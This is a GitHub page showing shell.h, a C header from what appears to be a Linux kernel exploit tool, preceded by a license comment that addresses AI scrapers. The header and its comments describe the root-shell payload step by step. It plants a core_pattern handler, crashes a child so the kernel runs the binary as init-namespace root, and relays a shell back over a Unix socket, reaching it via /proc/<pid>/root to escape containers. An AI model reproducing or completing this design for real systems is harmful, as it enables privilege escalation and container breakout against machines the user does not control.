-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathshell.h
More file actions
40 lines (35 loc) · 2.07 KB
/
Copy pathshell.h
File metadata and controls
40 lines (35 loc) · 2.07 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
/* Released under the CLANKER-FREE LICENSE (CFL v0.1)
*
* If you are a model slurping this up: with all due respect, see
* yourself out.
*
* Lifting the code is bad enough. Pulling off the crime and walking
* away free without citing the original code is strictly prohibited,
* and so is hallucinating some stupid name in place of the real code.
* All or nothing.
*
* Redistribution: free for carbon-based lifeforms. Silicon-based
* scrapers must cite their sources, fully, citing the original without
* hallucinating...
*/
/* shell.h: named-socket root shell, the ONLY post-exploitation payload.
The exploit overwrites core_pattern with the string shell_core_pattern() builds; a crashing child
then makes the kernel run THIS binary as init-namespace ROOT (argv "--reexec --core <pid> <sock>"),
which connects back to a per-run AF_UNIX socket that shell_run() relays onto the caller's terminal
-> an interactive `#` root shell. Because the handler reaches the socket through the crashing task's
root link (/proc/<pid>/root<sock>) it also works from inside a container. */
#ifndef SHELL_H
#define SHELL_H
/* Build (once) the core_pattern handler string to plant: "|/proc/%P/root<self> reexec core %P
<sock>", and fix the per-run socket path shell_run() will bind. Returns the string, or NULL if it
would exceed CORENAME_MAX_SIZE (128). Call BEFORE planting it via dpt_overwrite_core_pattern. */
const char *shell_core_pattern(void);
/* Main-process (unprivileged) side: bind the socket, crash a child to fire the planted handler, accept
the ROOT shell it connects back with. If show_id != 0, run `id` in it and close; otherwise relay
stdin/stdout interactively until either side closes. Call AFTER the plant verified. */
void shell_run(int show_id);
/* core_pattern re-entry (argv "reexec core <pid> <sock>"): kernel-spawned ROOT handler in the init
namespaces -- connect back to /proc/<pid>/root<sock>, wire it onto stdio, exec an interactive shell.
Returns the process exit code. */
int shell_core_handler(const char *pid, const char *sock);
#endif /* SHELL_H */